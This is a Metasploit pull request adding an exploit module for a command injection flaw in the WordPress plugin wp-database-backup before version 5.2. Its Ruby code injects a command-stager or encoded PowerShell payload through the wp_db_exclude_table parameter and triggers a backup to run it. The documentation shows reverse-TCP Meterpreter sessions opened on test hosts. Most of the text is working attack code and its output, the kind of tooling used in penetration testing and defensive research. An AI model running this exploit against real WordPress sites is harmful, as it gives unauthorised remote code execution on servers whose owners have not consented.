### PR TITLE
Add exploit module for wp-database-backup Wordpress plugin

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_db_backup_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_db_backup_rce.md
@@ -1,0 +1,103 @@
+## Description
+
+  There exists a command injection vulnerability in the Wordpress plugin `wp-database-backup` for versions < 5.2.
+  
+  For the backup functionality, the plugin generates a `mysqldump` command to execute. The user can choose specific
+  tables to exclude from the backup by setting the `wp_db_exclude_table` parameter in a POST request to the
+  `wp-database-backup` page. The names of the excluded tables are included in the `mysqldump` command unsanitized.
+
+  Arbitrary commands injected through the `wp_db_exclude_table` parameter are executed each time the functionality
+  for creating a new database backup are run.
+
+## Vulnerable Application
+
+  The `wp-database-backup` plugin < `v5.2`. The plugin can be found [here](https://wordpress.org/plugins/wp-database-backup/).
+  Older versions of the software can be found via the `advanced` view on the plugin's main page.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/wp_db_backup_rce```
+  4. Do: ```set RHOSTS <ip>```
+  5. Do: ```set USERNAME <user>```
+  6. Do: ```set PASSWORD <password>```
+  7. Do: ```run```
+  8. You should get a shell.
+
+## Scenarios
+
+### Tested on wp-database-backup v4.6.5 running Wordpress 5.1 on Ubuntu 18.04
+
+  ```
+  msf5 exploit(multi/http/wp_db_backup_rce) > set target 1
+  target => 1
+  msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147
+  rhosts => 192.168.37.147
+  msf5 exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/http/wp_db_backup_rce) > check
+
+  [*] Version of wp-database-backup detected: 4.6
+  [*] 192.168.37.147:80 - The target appears to be vulnerable.
+  msf5 exploit(multi/http/wp_db_backup_rce) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [+] Reached the wp-database-backup settings page
+  [+] Successfully added payload as an excluded table
+  [*] Sending stage (985320 bytes) to 192.168.37.147
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:48398) at 2019-06-25 11:05:27 -0500
+  [+] Successfully created a backup of the database
+  [+] Successfully deleted the database backup
+  [+] Successfully deleted the payload from the excluded tables list
+
+  meterpreter > getuid
+  Server username: uid=33, gid=33, euid=33, egid=33
+  meterpreter > sysinfo
+  Computer     : 192.168.37.147
+  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```
+
+### Tested on wp-database-backup v4.6.5 running Wordpress 5.2 on Windows 10
+
+  ```
+  msf5 > use exploit/multi/http/wp_db_backup_rce 
+  msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144
+  rhosts => 192.168.37.144
+  msf5 exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/http/wp_db_backup_rce) > set username user
+  username => user
+  msf5 exploit(multi/http/wp_db_backup_rce) > set password password
+  password => password
+  msf5 exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/http/wp_db_backup_rce) > check
+
+  [*] Version of wp-database-backup detected: 4.6
+  [*] 192.168.37.144:80 - The target appears to be vulnerable.
+  msf5 exploit(multi/http/wp_db_backup_rce) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [+] Reached the wp-database-backup settings page
+  [+] Successfully added payload as an excluded table
+  [*] Sending stage (206403 bytes) to 192.168.37.144
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.144:49844) at 2019-06-25 11:01:22 -0500
+  [+] Successfully created a backup of the database
+  [+] Successfully deleted the database backup
+  [+] Successfully deleted the payload from the excluded tables list
+
+  meterpreter > getuid
+  Server username: DESKTOP-RTVVNST\Shelby Pace
+  meterpreter > sysinfo
+  Computer        : DESKTOP-RTVVNST
+  OS              : Windows 10 (Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```

--- a/modules/exploits/multi/http/wp_db_backup_rce.rb
+++ b/modules/exploits/multi/http/wp_db_backup_rce.rb
@@ -4,11 +4,11 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
-  include Exploit::CmdStager
-  include Exploit::Powershell
-  include Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(update_info(info,
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
         ],
+      'Platform'       => [ 'win', 'linux' ],
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
         [
@@ -52,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform'        =>  'linux',
               'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
-              'CmdStagerFlavor' =>  'printf'
+              'CmdStagerFlavor' => [ :printf, :echo ]
             }
           ]
         ],
@@ -87,6 +88,17 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe
   end
 
+  def exploit
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie
+
+    res = create_exclude_table(cookie)
+    nonce = get_nonce(res)
+    create_backup(cookie, nonce)
+
+    clear_exclude_table(cookie)
+  end
+
   def create_exclude_table(cookie)
     @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
     res = send_request_cgi(
@@ -99,8 +111,8 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
     print_good('Reached the wp-database-backup settings page')
     if datastore['TARGET'] == 1
-      comm_payload = generate_cmdstager.first.gsub(';', '&&')
-      comm_payload = comm_payload.gsub('/tmp/', './')
+      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './', noarg: true)
+      comm_payload = comm_payload.join('&&')
       comm_payload = comm_payload.gsub('\'', '')
       comm_payload = "; #{comm_payload} ;"
     else
@@ -125,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_nonce(response)
-    fail_with(Failure::BadConfig, 'Failed to get a proper response') unless response
+    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response
 
     div_res = response.at('p[@class="submit"]')
     fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
@@ -166,47 +178,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res.get_html_document
   end
 
-  def get_index(response)
-    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response containing backup indexes') unless response
-
-    header = response.search('[@title="Remove Database Backup"]')
-    fail_with(Failure::NotFound, 'Did not retrieve match data to remove the db backup') unless header && header.length > 1
-    index = header[-1].to_s.match(/index=(\d)+/)
-
-    fail_with(Failure::NotFound, 'Failed to retrieve index of database backup') unless index && index.length > 1
-    index[1]
-  end
-
-  def remove_backup(cookie, nonce, index)
-    notif_res = send_request_cgi(
-      'method'    =>  'GET',
-      'uri'       =>  @exclude_uri,
-      'cookie'    =>  cookie,
-      'vars_get'  =>
-      {
-        'page'      =>  'wp-database-backup',
-        'action'    =>  'removebackup',
-        '_wpnonce'  =>  nonce,
-        'index'     =>  index
-      }
-    )
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve proper response to delete the database backup') unless notif_res && notif_res.code == 302
-
-    res = send_request_cgi(
-      'method'    =>  'GET',
-      'uri'       =>  @exclude_uri,
-      'cookie'    =>  cookie,
-      'vars_get'  =>
-      {
-        'page'          =>  'wp-database-backup',
-        'notification'  =>  'delete'
-      }
-    )
-
-    fail_with(Failure::UnexpectedReply, 'Failed to delete the database backup') unless res && res.code == 200 && res.body.include?('Database Backup deleted Successfully')
-    print_good('Successfully deleted the database backup')
-  end
-
   def clear_exclude_table(cookie)
     res = send_request_cgi(
       'method'    =>  'POST',
@@ -221,18 +192,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
    fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
    print_good('Successfully deleted the payload from the excluded tables list')
-  end
-
-  def exploit
-    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
-    fail_with(Failure::BadConfig, 'Unable to log into Wordpress') unless cookie
-
-    res = create_exclude_table(cookie)
-    nonce = get_nonce(res)
-    db_res = create_backup(cookie, nonce)
-
-    backup_index = get_index(db_res)
-    remove_backup(cookie, nonce, backup_index)
-    clear_exclude_table(cookie)
   end
 end

--- a/modules/exploits/multi/http/wp_db_backup_rce.rb
+++ b/modules/exploits/multi/http/wp_db_backup_rce.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Sample Exploit',
+      'Description'    => %q(
+          This exploit module illustrates how a vulnerability could be exploited
+        in an TCP server that has a parsing bug.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Mikey Veenstra / Wordfence'  # Vulnerability Discovery
+      ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
+        ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Ret'      => 0x41424344
+            }
+          ]
+        ],
+      'DisclosureDate' => "2019-04-24",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
+      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
+      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  changelog_uri
+    )
+
+    if res && res.code == 200
+      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
+      return CheckCode::Detected unless version && version.length > 1
+
+      vprint_status("Version of wp-database-backup detected: #{version[1]}")
+      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
+    end
+    CheckCode::Safe
+  end
+
+  def create_exclude_table(cookie)
+    exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
+    )
+
+    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
+  end
+
+  def exploit
+    cookie = wordpress_login
+    fail_with(Failure::BadConfig, 'Unable to log into Wordpress') unless cookie
+
+    create_exclude_table(cookie)
+  end
+end

--- a/modules/exploits/multi/http/wp_db_backup_rce.rb
+++ b/modules/exploits/multi/http/wp_db_backup_rce.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
+  include Exploit::CmdStager
   include Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
@@ -18,23 +19,34 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
       [
-        'Mikey Veenstra / Wordfence'  # Vulnerability Discovery
+        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
+        'Shelby Pace'                  # Metasploit module
       ],
       'References'     =>
         [
           [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
         ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'Targets'        =>
         [
           [
             'Windows',
             {
-              'Platform' => 'win',
-              'Ret'      => 0x41424344
+              'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' =>  'vbs'
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' =>  'printf'
             }
           ]
         ],
-      'DisclosureDate' => "2019-04-24",
+      'DisclosureDate' => '2019-04-24',
       'DefaultTarget'  => 0
     ))
 
@@ -59,28 +71,152 @@ class MetasploitModule < Msf::Exploit::Remote
       version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
       return CheckCode::Detected unless version && version.length > 1
 
-      vprint_status("Version of wp-database-backup detected: #{version[1]}")
+      print_status("Version of wp-database-backup detected: #{version[1]}")
       return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
     end
     CheckCode::Safe
   end
 
   def create_exclude_table(cookie)
-    exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
+    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
     res = send_request_cgi(
       'method'    =>  'GET',
-      'uri'       =>  exclude_uri,
+      'uri'       =>  @exclude_uri,
       'cookie'    =>  cookie,
       'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
     )
 
     fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
+    print_good('Reached the wp-database-backup settings page')
+    comm_payload = "; #{generate_cmdstager.first} ;"
+
+    table_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_post' =>
+      {
+        'wpsetting'                       =>  'Save',
+        'wp_db_exclude_table[wp_comment]' =>  comm_payload
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
+    print_good('Successfully added payload as an excluded table')
+
+    res.get_html_document
+  end
+
+  def get_nonce(response)
+    fail_with(Failure::BadConfig, 'Failed to get a proper response') unless response
+
+    div_res = response.at('p[@class="submit"]')
+    fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
+
+    wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
+    fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1
+
+    wpnonce[1]
+  end
+
+  def create_backup(cookie, nonce)
+    first_res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'      =>  'wp-database-backup',
+        '_wpnonce'  =>  nonce,
+        'action'    =>  'createdbbackup'
+      }
+    )
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a proper response to create a database backup') unless first_res && first_res.code == 302
+
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'          =>  'wp-database-backup',
+        'notification'  =>  'create'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
+    print_good('Successfully created a backup of the database')
+
+    res.get_html_document
+  end
+
+  def get_index(response)
+    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response containing backup indexes') unless response
+
+    header = response.search('[@title="Remove Database Backup"]')
+    fail_with(Failure::NotFound, 'Did not retrieve match data to remove the db backup') unless header && header.length > 1
+    index = header[-1].to_s.match(/index=(\d)+/)
+
+    fail_with(Failure::NotFound, 'Failed to retrieve index of database backup') unless index && index.length > 1
+    index[1]
+  end
+
+  def remove_backup(cookie, nonce, index)
+    notif_res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'      =>  'wp-database-backup',
+        'action'    =>  'removebackup',
+        '_wpnonce'  =>  nonce,
+        'index'     =>  index
+      }
+    )
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve proper response to delete the database backup') unless notif_res && notif_res.code == 302
+
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_get'  =>
+      {
+        'page'          =>  'wp-database-backup',
+        'notification'  =>  'delete'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Failed to delete the database backup') unless res && res.code == 200 && res.body.include?('Database Backup deleted Successfully')
+    print_good('Successfully deleted the database backup')
+  end
+
+  def clear_exclude_table(cookie)
+    res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  @exclude_uri,
+      'cookie'    =>  cookie,
+      'vars_post' =>
+      {
+        'wpsetting'                       =>  'Save',
+        'wp_db_exclude_table[wp_comment]' =>  'wp_comment'
+      }
+    )
+
+   fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
+   print_good('Successfully deleted the payload from the excluded tables list')
   end
 
   def exploit
-    cookie = wordpress_login
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
     fail_with(Failure::BadConfig, 'Unable to log into Wordpress') unless cookie
 
-    create_exclude_table(cookie)
+    res = create_exclude_table(cookie)
+    nonce = get_nonce(res)
+    db_res = create_backup(cookie, nonce)
+
+    backup_index = get_index(db_res)
+    remove_backup(cookie, nonce, backup_index)
+    clear_exclude_table(cookie)
   end
 end

--- a/modules/exploits/multi/http/wp_db_backup_rce.rb
+++ b/modules/exploits/multi/http/wp_db_backup_rce.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform'        =>  'linux',
               'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
-              'CmdStagerFlavor' => [ :printf, :echo ]
+              'CmdStagerFlavor' =>  'printf'
             }
           ]
         ],
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
     print_good('Reached the wp-database-backup settings page')
     if datastore['TARGET'] == 1
-      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './', noarg: true)
+      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
       comm_payload = comm_payload.join('&&')
       comm_payload = comm_payload.gsub('\'', '')
       comm_payload = "; #{comm_payload} ;"

--- a/modules/exploits/multi/http/wp_db_backup_rce.rb
+++ b/modules/exploits/multi/http/wp_db_backup_rce.rb
@@ -7,14 +7,25 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Exploit::CmdStager
+  include Exploit::Powershell
   include Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Sample Exploit',
+      'Name'           => 'WP Database Backup RCE',
       'Description'    => %q(
-          This exploit module illustrates how a vulnerability could be exploited
-        in an TCP server that has a parsing bug.
+        There exists a command injection vulnerability in the Wordpress plugin
+        `wp-database-backup` for versions < 5.2.
+
+        For the backup functionality, the plugin generates a `mysqldump` command
+        to execute. The user can choose specific tables to exclude from the backup
+        by setting the `wp_db_exclude_table` parameter in a POST request to the
+        `wp-database-backup` page. The names of the excluded tables are included in
+        the `mysqldump` command unsanitized. Arbitrary commands injected through the
+        `wp_db_exclude_table` parameter are executed each time the functionality
+        for creating a new database backup are run.
+
+        Authentication is required to successfully exploit this vulnerability.
       ),
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -33,8 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Windows',
             {
               'Platform'        => 'win',
-              'Arch'            => [ ARCH_X86, ARCH_X64 ],
-              'CmdStagerFlavor' =>  'vbs'
+              'Arch'            => [ ARCH_X86, ARCH_X64 ]
             }
           ],
           [
@@ -88,7 +98,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
     print_good('Reached the wp-database-backup settings page')
-    comm_payload = "; #{generate_cmdstager.first} ;"
+    if datastore['TARGET'] == 1
+      comm_payload = generate_cmdstager.first.gsub(';', '&&')
+      comm_payload = comm_payload.gsub('/tmp/', './')
+      comm_payload = comm_payload.gsub('\'', '')
+      comm_payload = "; #{comm_payload} ;"
+    else
+      comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
+    end
 
     table_res = send_request_cgi(
       'method'    =>  'POST',
@@ -131,7 +148,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'action'    =>  'createdbbackup'
       }
     )
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a proper response to create a database backup') unless first_res && first_res.code == 302
 
     res = send_request_cgi(
       'method'    =>  'GET',


### PR DESCRIPTION
This adds a module that exploits a command injection vulnerability in `wp-database-backup` versions < `v5.2`. In the creation of a database backup, this software generates a `mysqldump` command. The user can opt to exclude certain tables via the plugin settings. The `wp_db_exclude_table` parameters in the POST request for choosing tables to exclude is unsanitized, which allows for code execution when the `ignore-table` option is later used in the `mysqldump` command that creates the database backup. Authentication is required to successfully exploit this vulnerability.

## Verification

 - [x] Install the application
 - [x] Start msfconsole
 - [x] Do: ```use exploit/multi/http/wp_db_backup_rce```
 - [x] Do: ```set RHOSTS <ip>```
 - [x] Do: ```set USERNAME <user>```
 - [x] Do: ```set PASSWORD <password>```
 - [x] Do: ```run```
 - [x] You should get a shell.

